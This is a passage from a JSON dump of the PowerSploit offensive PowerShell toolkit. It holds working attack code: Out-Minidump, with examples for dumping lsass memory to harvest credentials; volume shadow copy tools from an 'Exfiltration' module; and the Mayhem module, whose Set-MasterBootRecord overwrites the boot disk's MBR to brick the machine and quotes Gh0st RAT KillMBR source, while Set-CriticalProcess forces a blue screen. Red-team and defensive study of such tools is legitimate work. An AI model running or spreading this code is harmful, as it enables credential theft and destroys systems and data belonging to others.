    "content": "function Out-Minidump\n{\n<#\n.SYNOPSIS\n\n    Generates a full-memory minidump of a process.\n\n    PowerSploit Function: Out-Minidump\n    Author: Matthew Graeber (@mattifestation)\n    License: BSD 3-Clause\n    Required Dependencies: None\n    Optional Dependencies: None\n\n.DESCRIPTION\n\n    Out-Minidump writes a process dump file with all process memory to disk.\n    This is similar to running procdump.exe with the '-ma' switch.\n\n.PARAMETER Process\n\n    Specifies the process for which a dump will be generated. The process object\n    is obtained with Get-Process.\n\n.PARAMETER DumpFilePath\n\n    Specifies the path where dump files will be written. By default, dump files\n    are written to the current working directory. Dump file names take following\n    form: processname_id.dmp\n\n.EXAMPLE\n\n    Out-Minidump -Process (Get-Process -Id 4293)\n\n    Description\n    -----------\n    Generate a minidump for process ID 4293.\n\n.EXAMPLE\n\n    Get-Process lsass | Out-Minidump\n\n    Description\n    -----------\n    Generate a minidump for the lsass process. Note: To dump lsass, you must be\n    running from an elevated prompt.\n\n.EXAMPLE\n\n    Get-Process | Out-Minidump -DumpFilePath C:\\temp\n\n    Description\n    -----------\n    Generate a minidump of all running processes and save them to C:\\temp.\n\n.INPUTS\n\n    System.Diagnostics.Process\n\n    You can pipe a process object to Out-Minidump.\n\n.OUTPUTS\n\n    System.IO.FileInfo\n\n.LINK\n\n    http://www.exploit-monday.com/\n#>\n\n    [CmdletBinding()]\n    Param (\n        [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True)]\n        [System.Diagnostics.Process]\n        $Process,\n\n        [Parameter(Position = 1)]\n        [ValidateScript({ Test-Path $_ })]\n        [String]\n        $DumpFilePath = $PWD\n    )\n\n    BEGIN\n    {\n        $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')\n        $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic')\n        $Flags = [Reflection.BindingFlags] 'NonPublic, Static'\n        $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags)\n        $MiniDumpWithFullMemory = [UInt32] 2\n    }\n\n    PROCESS\n    {\n        $ProcessId = $Process.Id\n        $ProcessName = $Process.Name\n        $ProcessHandle = $Process.Handle\n        $ProcessFileName = \"$($ProcessName)_$($ProcessId).dmp\"\n\n        $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName\n\n        $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create)\n\n        $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,\n                                                     $ProcessId,\n                                                     $FileStream.SafeFileHandle,\n                                                     $MiniDumpWithFullMemory,\n                                                     [IntPtr]::Zero,\n                                                     [IntPtr]::Zero,\n                                                     [IntPtr]::Zero))\n\n        $FileStream.Close()\n\n        if (-not $Result)\n        {\n            $Exception = New-Object ComponentModel.Win32Exception\n            $ExceptionMessage = \"$($Exception.Message) ($($ProcessName):$($ProcessId))\"\n\n            # Remove any partially written dump files. For example, a partial dump will be written\n            # in the case when 32-bit PowerShell tries to dump a 64-bit process.\n            Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue\n\n            throw $ExceptionMessage\n        }\n        else\n        {\n            Get-ChildItem $ProcessDumpPath\n        }\n    }\n\n    END {}\n}\n"
  },
  {
    "path": "Exfiltration/Usage.md",
    "content": "To install this module, drop the entire Exfiltration folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.\r\n\r\nThe default per-user module path is: \"$Env:HomeDrive$Env:HOMEPATH\\Documents\\WindowsPowerShell\\Modules\"\r\nThe default computer-level module path is: \"$Env:windir\\System32\\WindowsPowerShell\\v1.0\\Modules\"\r\n\r\nTo use the module, type `Import-Module Exfiltration`\r\n\r\nTo see the commands imported, type `Get-Command -Module Exfiltration`\r\n\r\nFor help on each individual command, Get-Help is your friend.\r\n\r\nNote: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability."
  },
  {
    "path": "Exfiltration/VolumeShadowCopyTools.ps1",
    "content": "function Get-VolumeShadowCopy\n{\n<#\n.SYNOPSIS\n\n    Lists the device paths of all local volume shadow copies.\n\n    PowerSploit Function: Get-VolumeShadowCopy\n    Author: Matthew Graeber (@mattifestation)\n    License: BSD 3-Clause\n    Required Dependencies: None\n    Optional Dependencies: None\n#>\n\n    $UserIdentity = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent())\n\n    if (-not $UserIdentity.IsInRole([Security.Principal.WindowsBuiltInRole]'Administrator'))\n    {\n        Throw 'You must run Get-VolumeShadowCopy from an elevated command prompt.'\n    }\n\n    Get-WmiObject -Namespace root\\cimv2 -Class Win32_ShadowCopy | ForEach-Object { $_.DeviceObject }\n}\n\nfunction New-VolumeShadowCopy\n{\n<#\n.SYNOPSIS\n\n    Creates a new volume shadow copy.\n\n    PowerSploit Function: New-VolumeShadowCopy\n    Author: Jared Atkinson (@jaredcatkinson)\n    License: BSD 3-Clause\n    Required Dependencies: None\n    Optional Dependencies: None\n\n.DESCRIPTION\n\n    New-VolumeShadowCopy creates a volume shadow copy for the specified volume.\n\n.PARAMETER Volume\n\n    Volume used for the shadow copy. This volume is sometimes referred to as the original volume. \n    The Volume parameter can be specified as a volume drive letter, mount point, or volume globally unique identifier (GUID) name.\n\n.PARAMETER Context\n\n    Context that the provider uses when creating the shadow. The default is \"ClientAccessible\".\n\n.EXAMPLE\n\n    New-VolumeShadowCopy -Volume C:\\\n\n    Description\n    -----------\n    Creates a new VolumeShadowCopy of the C drive\n#>\n    Param(\n        [Parameter(Mandatory = $True)]\n        [ValidatePattern('^\\w:\\\\')]\n        [String]\n        $Volume,\n\n        [Parameter(Mandatory = $False)]\n        [ValidateSet(\"ClientAccessible\")]\n        [String]\n        $Context = \"ClientAccessible\"\n    )\n\n    $UserIdentity = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent())\n\n    if (-not $UserIdentity.IsInRole([Security.Principal.WindowsBuiltInRole]'Administrator'))\n    {\n        Throw 'You must run Get-VolumeShadowCopy from an elevated command prompt.'\n    }\n\n    # Save VSS Service initial state\n    $running = (Get-Service -Name VSS).Status\n\n    $class = [WMICLASS]\"root\\cimv2:win32_shadowcopy\"\n\n    $return = $class.create(\"$Volume\", \"$Context\")\n\n    switch($return.returnvalue)\n    {\n        1 {Write-Error \"Access denied.\"; break}\n        2 {Write-Error \"Invalid argument.\"; break}\n        3 {Write-Error \"Specified volume not found.\"; break}\n        4 {Write-Error \"Specified volume not supported.\"; break}\n        5 {Write-Error \"Unsupported shadow copy context.\"; break}\n        6 {Write-Error \"Insufficient storage.\"; break}\n        7 {Write-Error \"Volume is in use.\"; break}\n        8 {Write-Error \"Maximum number of shadow copies reached.\"; break}\n        9 {Write-Error \"Another shadow copy operation is already in progress.\"; break}\n        10 {Write-Error \"Shadow copy provider vetoed the operation.\"; break}\n        11 {Write-Error \"Shadow copy provider not registered.\"; break}\n        12 {Write-Error \"Shadow copy provider failure.\"; break}\n        13 {Write-Error \"Unknown error.\"; break}\n        default {break}\n    }\n\n    # If VSS Service was Stopped at the start, return VSS to \"Stopped\" state\n    if($running -eq \"Stopped\")\n    {\n        Stop-Service -Name VSS\n    }\n}\n\nfunction Remove-VolumeShadowCopy\n{\n<#\n.SYNOPSIS\n\n    Deletes a volume shadow copy.\n\n    PowerSploit Function: Remove-VolumeShadowCopy\n    Author: Jared Atkinson (@jaredcatkinson)\n    License: BSD 3-Clause\n    Required Dependencies: None\n    Optional Dependencies: None\n\n.DESCRIPTION\n\n    Remove-VolumeShadowCopy deletes a volume shadow copy from the system.\n\n.PARAMETER InputObject\n\n    Specifies the Win32_ShadowCopy object to remove\n\n.PARAMETER DevicePath\n\n    Specifies the volume shadow copy 'DeviceObject' path. This path can be retrieved with the Get-VolumeShadowCopy PowerSploit function or with the Win32_ShadowCopy object.\n\n.EXAMPLE\n\n    Get-VolumeShadowCopy | Remove-VolumeShadowCopy\n\n    Description\n    -----------\n    Removes all volume shadow copy\n\n.EXAMPLE\n\n    Remove-VolumeShadowCopy -DevicePath '\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy4'\n\n    Description\n    -----------\n    Removes the volume shadow copy at the 'DeviceObject' path \\\\?\\GLOBALROOT\\DeviceHarddiskVolumeShadowCopy4\n#>\n    [CmdletBinding(SupportsShouldProcess = $True)]\n    Param(\n        [Parameter(Mandatory = $True, ValueFromPipeline = $True)]\n        [ValidatePattern('^\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy[0-9]{1,3}$')]\n        [String]\n        $DevicePath\n    )\n\n    PROCESS\n    {\n        if($PSCmdlet.ShouldProcess(\"The VolumeShadowCopy at DevicePath $DevicePath will be removed\"))\n        {\n            (Get-WmiObject -Namespace root\\cimv2 -Class Win32_ShadowCopy | Where-Object {$_.DeviceObject -eq $DevicePath}).Delete()\n        }\n    }\n}\n\nfunction Mount-VolumeShadowCopy\n{\n<#\n.SYNOPSIS\n\n    Mounts a volume shadow copy.\n\n    PowerSploit Function: Mount-VolumeShadowCopy\n    Author: Matthew Graeber (@mattifestation)\n    License: BSD 3-Clause\n    Required Dependencies: None\n    Optional Dependencies: None\n\n.DESCRIPTION\n\n    Mount-VolumeShadowCopy mounts a volume shadow copy volume by creating a symbolic link.\n\n.PARAMETER Path\n\n    Specifies the path to which the symbolic link for the mounted volume shadow copy will be saved.\n\n.PARAMETER DevicePath\n\n    Specifies the volume shadow copy 'DeviceObject' path. This path can be retrieved with the Get-VolumeShadowCopy PowerSploit function or with the Win32_ShadowCopy object.\n\n.EXAMPLE\n\n    Get-VolumeShadowCopy | Mount-VolumeShadowCopy -Path C:\\VSS\n\n    Description\n    -----------\n    Create a mount point in 'C:\\VSS' for each volume shadow copy volume\n\n.EXAMPLE\n\n    Mount-VolumeShadowCopy -Path C:\\VSS -DevicePath '\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy4'\n\n.EXAMPLE\n\n    Get-WmiObject Win32_ShadowCopy | % { $_.DeviceObject -Path C:\\VSS -DevicePath $_ }\n#>\n\n    Param (\n        [Parameter(Mandatory = $True)]\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Path,\n\n        [Parameter(Mandatory = $True, ValueFromPipeline = $True)]\n        [ValidatePattern('^\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy[0-9]{1,3}$')]\n        [String[]]\n        $DevicePath\n    )\n\n    BEGIN\n    {\n        $UserIdentity = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent())\n\n        if (-not $UserIdentity.IsInRole([Security.Principal.WindowsBuiltInRole]'Administrator'))\n        {\n            Throw 'You must run Get-VolumeShadowCopy from an elevated command prompt.'\n        }\n\n        # Validate that the path exists before proceeding\n        Get-ChildItem $Path -ErrorAction Stop | Out-Null\n\n        $DynAssembly = New-Object System.Reflection.AssemblyName('VSSUtil')\n        $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)\n        $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('VSSUtil', $False)\n\n        # Define [VSS.Kernel32]::CreateSymbolicLink method using reflection\n        # (i.e. none of the forensic artifacts left with using Add-Type)\n        $TypeBuilder = $ModuleBuilder.DefineType('VSS.Kernel32', 'Public, Class')\n        $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('CreateSymbolicLink',\n                                                            'kernel32.dll',\n                                                            ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static),\n                                                            [Reflection.CallingConventions]::Standard,\n                                                            [Bool],\n                                                            [Type[]]@([String], [String], [UInt32]),\n                                                            [Runtime.InteropServices.CallingConvention]::Winapi,\n                                                            [Runtime.InteropServices.CharSet]::Auto)\n        $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))\n        $SetLastError = [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError')\n        $SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor,\n                                                                                         @('kernel32.dll'),\n                                                                                         [Reflection.FieldInfo[]]@($SetLastError),\n                                                                                         @($true))\n        $PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)\n\n        $Kernel32Type = $TypeBuilder.CreateType()\n    }\n\n    PROCESS\n    {\n        foreach ($Volume in $DevicePath)\n        {\n            $Volume -match '^\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\(?<LinkName>HarddiskVolumeShadowCopy[0-9]{1,3})$' | Out-Null\n            \n            $LinkPath = Join-Path $Path $Matches.LinkName\n\n            if (Test-Path $LinkPath)\n            {\n                Write-Warning \"'$LinkPath' already exists.\"\n                continue\n            }\n\n            if (-not $Kernel32Type::CreateSymbolicLink($LinkPath, \"$($Volume)\\\", 1))\n            {\n                Write-Error \"Symbolic link creation failed for '$Volume'.\"\n                continue\n            }\n\n            Get-Item $LinkPath\n        }\n    }\n\n    END\n    {\n\n    }\n}\n"
  },
  {
    "path": "LICENSE",
    "content": "PowerSploit is provided under the 3-clause BSD license below.\r\n\r\n*************************************************************\r\n\r\nCopyright (c) 2012, Matthew Graeber\r\nAll rights reserved.\r\n\r\nRedistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:\r\n\r\n    Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.\r\n    Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.\r\n    The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission.\r\n\r\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\r\n\r\n\r\n"
  },
  {
    "path": "Mayhem/Mayhem.psd1",
    "content": "@{\n\n# Script module or binary module file associated with this manifest.\nModuleToProcess = 'Mayhem.psm1'\n\n# Version number of this module.\nModuleVersion = '3.0.0.0'\n\n# ID used to uniquely identify this module\nGUID = 'e65b93ff-63ba-4c38-97f1-bc4fe5a6651c'\n\n# Author of this module\nAuthor = 'Matthew Graeber'\n\n# Copyright statement for this module\nCopyright = 'BSD 3-Clause'\n\n# Description of the functionality provided by this module\nDescription = 'PowerSploit Mayhem Module'\n\n# Minimum version of the Windows PowerShell engine required by this module\nPowerShellVersion = '2.0'\n\n# Functions to export from this module\nFunctionsToExport = '*'\n\n# List of all files packaged with this module\nFileList = 'Mayhem.psm1', 'Mayhem.psd1', 'Usage.md'\n\n}\n"
  },
  {
    "path": "Mayhem/Mayhem.psm1",
    "content": "function Set-MasterBootRecord\n{\n<#\n.SYNOPSIS\n\nProof of concept code that overwrites the master boot record with the\nmessage of your choice.\n\nPowerSploit Function: Set-MasterBootRecord  \nAuthor: Matthew Graeber (@mattifestation) and Chris Campbell (@obscuresec)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \nOptional Dependencies: None  \n\n.DESCRIPTION\n\nSet-MasterBootRecord is proof of concept code designed to show that it is\npossible with PowerShell to overwrite the MBR. This technique was taken\nfrom a public malware sample. This script is inteded solely as proof of\nconcept code.\n\n.PARAMETER BootMessage\n\nSpecifies the message that will be displayed upon making your computer a brick.\n\n.PARAMETER RebootImmediately\n\nReboot the machine immediately upon overwriting the MBR.\n\n.PARAMETER Force\n\nSuppress the warning prompt.\n\n.EXAMPLE\n\nSet-MasterBootRecord -BootMessage 'This is what happens when you fail to defend your network. #CCDC'\n\n.NOTES\n\nObviously, this will only work if you have a master boot record to\noverwrite. This won't work if you have a GPT (GUID partition table).\n\nThis code was inspired by the Gh0st RAT source code seen here (acquired from: http://webcache.googleusercontent.com/search?q=cache:60uUuXfQF6oJ:read.pudn.com/downloads116/sourcecode/hack/trojan/494574/gh0st3.6_%25E6%25BA%2590%25E4%25BB%25A3%25E7%25A0%2581/gh0st/gh0st.cpp__.htm+&cd=3&hl=en&ct=clnk&gl=us):\n\n// CGh0stApp message handlers\n\nunsigned char scode[] =\n\"\\xb8\\x12\\x00\\xcd\\x10\\xbd\\x18\\x7c\\xb9\\x18\\x00\\xb8\\x01\\x13\\xbb\\x0c\"\n\"\\x00\\xba\\x1d\\x0e\\xcd\\x10\\xe2\\xfe\\x49\\x20\\x61\\x6d\\x20\\x76\\x69\\x72\"\n\"\\x75\\x73\\x21\\x20\\x46\\x75\\x63\\x6b\\x20\\x79\\x6f\\x75\\x20\\x3a\\x2d\\x29\";\n\nint CGh0stApp::KillMBR()\n{\n\tHANDLE hDevice;\n\tDWORD dwBytesWritten, dwBytesReturned;\n\tBYTE pMBR[512] = {0};\n\n\t// ????MBR\n\tmemcpy(pMBR, scode, sizeof(scode) - 1);\n\tpMBR[510] = 0x55;\n\tpMBR[511] = 0xAA;\n\n\thDevice = CreateFile\n\t\t(\n\t\t\"\\\\\\\\.\\\\PHYSICALDRIVE0\",\n\t\tGENERIC_READ | GENERIC_WRITE,\n\t\tFILE_SHARE_READ | FILE_SHARE_WRITE,\n\t\tNULL,\n\t\tOPEN_EXISTING,\n\t\t0,\n\t\tNULL\n\t\t);\n\tif (hDevice == INVALID_HANDLE_VALUE)\n\t\treturn -1;\n\tDeviceIoControl\n\t\t(\n\t\thDevice,\n\t\tFSCTL_LOCK_VOLUME,\n\t\tNULL,\n\t\t0,\n\t\tNULL,\n\t\t0,\n\t\t&dwBytesReturned,\n\t\tNUL\n\t\t)\n\t// ??????\n\tWriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);\n\tDeviceIoControl\n\t\t(\n\t\thDevice,\n\t\tFSCTL_UNLOCK_VOLUME,\n\t\tNULL,\n\t\t0,\n\t\tNULL,\n\t\t0,\n\t\t&dwBytesReturned,\n\t\tNULL\n\t\t);\n\tCloseHandle(hDevice);\n\n\tExitProcess(-1);\n\treturn 0;\n}\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingWMICmdlet', '')]\n    [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')]\n    Param (\n        [ValidateLength(1, 479)]\n        [String]\n        $BootMessage = 'Stop-Crying; Get-NewHardDrive',\n\n        [Switch]\n        $RebootImmediately,\n\n        [Switch]\n        $Force\n    )\n\n    if (!([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]'Administrator'))\n    {\n        throw 'This script must be executed from an elevated command prompt.'\n    }\n\n    if (!$Force)\n    {\n        if (!$psCmdlet.ShouldContinue('Do you want to continue?','Set-MasterBootRecord prevent your machine from booting.'))\n        {\n            return\n        }\n    }\n\n    #region define P/Invoke types dynamically\n    $DynAssembly = New-Object System.Reflection.AssemblyName('Win32')\n    $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)\n    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32', $False)\n\n    $TypeBuilder = $ModuleBuilder.DefineType('Win32.Kernel32', 'Public, Class')\n    $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))\n    $SetLastError = [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError')\n    $SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor,\n        @('kernel32.dll'),\n        [Reflection.FieldInfo[]]@($SetLastError),\n        @($True))\n\n    # Define [Win32.Kernel32]::DeviceIoControl\n    $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('DeviceIoControl',\n        'kernel32.dll',\n        ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static),\n        [Reflection.CallingConventions]::Standard,\n        [Bool],\n        [Type[]]@([IntPtr], [UInt32], [IntPtr], [UInt32], [IntPtr], [UInt32], [UInt32].MakeByRefType(), [IntPtr]),\n        [Runtime.InteropServices.CallingConvention]::Winapi,\n        [Runtime.InteropServices.CharSet]::Auto)\n    $PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)\n\n    # Define [Win32.Kernel32]::CreateFile\n    $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('CreateFile',\n        'kernel32.dll',\n        ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static),\n        [Reflection.CallingConventions]::Standard,\n        [IntPtr],\n        [Type[]]@([String], [Int32], [UInt32], [IntPtr], [UInt32], [UInt32], [IntPtr]),\n        [Runtime.InteropServices.CallingConvention]::Winapi,\n        [Runtime.InteropServices.CharSet]::Ansi)\n    $PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)\n\n    # Define [Win32.Kernel32]::WriteFile\n    $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('WriteFile',\n        'kernel32.dll',\n        ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static),\n        [Reflection.CallingConventions]::Standard,\n        [Bool],\n        [Type[]]@([IntPtr], [IntPtr], [UInt32], [UInt32].MakeByRefType(), [IntPtr]),\n        [Runtime.InteropServices.CallingConvention]::Winapi,\n        [Runtime.InteropServices.CharSet]::Ansi)\n    $PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)\n\n    # Define [Win32.Kernel32]::CloseHandle\n    $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('CloseHandle',\n        'kernel32.dll',\n        ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static),\n        [Reflection.CallingConventions]::Standard,\n        [Bool],\n        [Type[]]@([IntPtr]),\n        [Runtime.InteropServices.CallingConvention]::Winapi,\n        [Runtime.InteropServices.CharSet]::Auto)\n    $PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)\n\n    $Kernel32 = $TypeBuilder.CreateType()\n    #endregion\n\n    $LengthBytes = [BitConverter]::GetBytes(([Int16] ($BootMessage.Length + 5)))\n    # Convert the boot message to a byte array\n    $MessageBytes = [Text.Encoding]::ASCII.GetBytes(('PS > ' + $BootMessage))\n\n    [Byte[]] $MBRInfectionCode = @(\n        0xb8, 0x12, 0x00,         # MOV  AX, 0x0012 ; CMD: Set video mode, ARG: text resolution 80x30, pixel resolution 640x480, colors 16/256K, VGA\n        0xcd, 0x10,               # INT  0x10       ; BIOS interrupt call - Set video mode\n        0xb8, 0x00, 0x0B,         # MOV  AX, 0x0B00 ; CMD: Set background color\n        0xbb, 0x01, 0x00,         # MOV  BX, 0x000F ; Background color: Blue\n        0xcd, 0x10,               # INT  0x10       ; BIOS interrupt call - Set background color\n        0xbd, 0x20, 0x7c,         # MOV  BP, 0x7C18 ; Offset to string: 0x7C00 (base of MBR code) + 0x20\n        0xb9) + $LengthBytes + @( # MOV  CX, 0x0018 ; String length\n        0xb8, 0x01, 0x13,         # MOV  AX, 0x1301 ; CMD: Write string, ARG: Assign BL attribute (color) to all characters\n        0xbb, 0x0f, 0x00,         # MOV  BX, 0x000F ; Page Num: 0, Color: White\n        0xba, 0x00, 0x00,         # MOV  DX, 0x0000 ; Row: 0, Column: 0\n        0xcd, 0x10,               # INT  0x10       ; BIOS interrupt call - Write string\n        0xe2, 0xfe                # LOOP 0x16       ; Print all characters to the buffer\n        ) + $MessageBytes\n\n    $MBRSize = [UInt32] 512\n\n    if ($MBRInfectionCode.Length -gt ($MBRSize - 2))\n    {\n        throw \"The size of the MBR infection code cannot exceed $($MBRSize - 2) bytes.\"\n    }\n\n    # Allocate 512 bytes for the MBR\n    $MBRBytes = [Runtime.InteropServices.Marshal]::AllocHGlobal($MBRSize)\n\n    # Zero-initialize the allocated unmanaged memory\n    0..511 | ForEach-Object { [Runtime.InteropServices.Marshal]::WriteByte([IntPtr]::Add($MBRBytes, $_), 0) }\n\n    [Runtime.InteropServices.Marshal]::Copy($MBRInfectionCode, 0, $MBRBytes, $MBRInfectionCode.Length)\n\n    # Write boot record signature to the end of the MBR\n    [Runtime.InteropServices.Marshal]::WriteByte([IntPtr]::Add($MBRBytes, ($MBRSize - 2)), 0x55)\n    [Runtime.InteropServices.Marshal]::WriteByte([IntPtr]::Add($MBRBytes, ($MBRSize - 1)), 0xAA)\n\n    # Get the device ID of the boot disk\n    $DeviceID = Get-WmiObject -Class Win32_DiskDrive -Filter 'Index = 0' | Select-Object -ExpandProperty DeviceID\n\n    $GENERIC_READWRITE = 0x80000000 -bor 0x40000000\n    $FILE_SHARE_READWRITE = 2 -bor 1\n    $OPEN_EXISTING = 3\n\n    # Obtain a read handle to the raw disk\n    $DriveHandle = $Kernel32::CreateFile($DeviceID, $GENERIC_READWRITE, $FILE_SHARE_READWRITE, 0, $OPEN_EXISTING, 0, 0)\n\n    if ($DriveHandle -eq ([IntPtr] 0xFFFFFFFF))\n    {\n        throw \"Unable to obtain read/write handle to $DeviceID\"\n    }\n\n    $BytesReturned = [UInt32] 0\n    $BytesWritten =  [UInt32] 0\n    $FSCTL_LOCK_VOLUME =   0x00090018\n    $FSCTL_UNLOCK_VOLUME = 0x0009001C\n\n    $null = $Kernel32::DeviceIoControl($DriveHandle, $FSCTL_LOCK_VOLUME, 0, 0, 0, 0, [Ref] $BytesReturned, 0)\n    $null = $Kernel32::WriteFile($DriveHandle, $MBRBytes, $MBRSize, [Ref] $BytesWritten, 0)\n    $null = $Kernel32::DeviceIoControl($DriveHandle, $FSCTL_UNLOCK_VOLUME, 0, 0, 0, 0, [Ref] $BytesReturned, 0)\n    $null = $Kernel32::CloseHandle($DriveHandle)\n\n    Start-Sleep -Seconds 2\n\n    [Runtime.InteropServices.Marshal]::FreeHGlobal($MBRBytes)\n\n    Write-Verbose 'Master boot record overwritten successfully.'\n\n    if ($RebootImmediately)\n    {\n        Restart-Computer -Force\n    }\n}\n\nfunction Set-CriticalProcess\n{\n<#\n.SYNOPSIS\n\nCauses your machine to blue screen upon exiting PowerShell.\n\nPowerSploit Function: Set-CriticalProcess  \nAuthor: Matthew Graeber (@mattifestation)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \nOptional Dependencies: None  \n\n.PARAMETER ExitImmediately\n\nImmediately exit PowerShell after successfully marking the process as critical.\n\n.PARAMETER Force\n\nSet the running PowerShell process as critical without asking for confirmation.\n\n.EXAMPLE\n\nSet-CriticalProcess\n\n.EXAMPLE\n\nSet-CriticalProcess -ExitImmediately\n\n.EXAMPLE\n\nSet-CriticalProcess -Force -Verbose\n\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]\n    [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')]\n    Param (\n        [Switch]\n        $Force,\n\n        [Switch]\n        $ExitImmediately\n    )\n\n    if (-not ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator))\n    {\n        throw 'You must run Set-CriticalProcess from an elevated PowerShell prompt.'\n    }\n\n    $Response = $True\n\n    if (!$Force)\n    {\n        $Response = $psCmdlet.ShouldContinue('Have you saved all your work?', 'The machine will blue screen when you exit PowerShell.')\n    }\n\n    if (!$Response)\n    {\n        return\n    }\n\n    $DynAssembly = New-Object System.Reflection.AssemblyName('BlueScreen')\n    $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)\n    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('BlueScreen', $False)\n\n    # Define [ntdll]::NtQuerySystemInformation method\n    $TypeBuilder = $ModuleBuilder.DefineType('BlueScreen.Win32.ntdll', 'Public, Class')\n    $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('NtSetInformationProcess',\n                                                        'ntdll.dll',\n                                                        ([Reflection.MethodAttributes] 'Public, Static'),\n                                                        [Reflection.CallingConventions]::Standard,\n                                                        [Int32],\n                                                        [Type[]] @([IntPtr], [UInt32], [IntPtr].MakeByRefType(), [UInt32]),\n                                                        [Runtime.InteropServices.CallingConvention]::Winapi,\n                                                        [Runtime.InteropServices.CharSet]::Auto)\n\n    $ntdll = $TypeBuilder.CreateType()\n\n    $ProcHandle = [Diagnostics.Process]::GetCurrentProcess().Handle\n    $ReturnPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(4)\n\n    $ProcessBreakOnTermination = 29\n    $SizeUInt32 = 4\n\n    try\n    {\n        $null = $ntdll::NtSetInformationProcess($ProcHandle, $ProcessBreakOnTermination, [Ref] $ReturnPtr, $SizeUInt32)\n    }\n    catch\n    {\n        return\n    }\n\n    Write-Verbose 'PowerShell is now marked as a critical process and will blue screen the machine upon exiting the process.'\n\n    if ($ExitImmediately)\n    {\n        Stop-Process -Id $PID\n    }\n}\n"
  },
  {
    "path": "Mayhem/Usage.md",
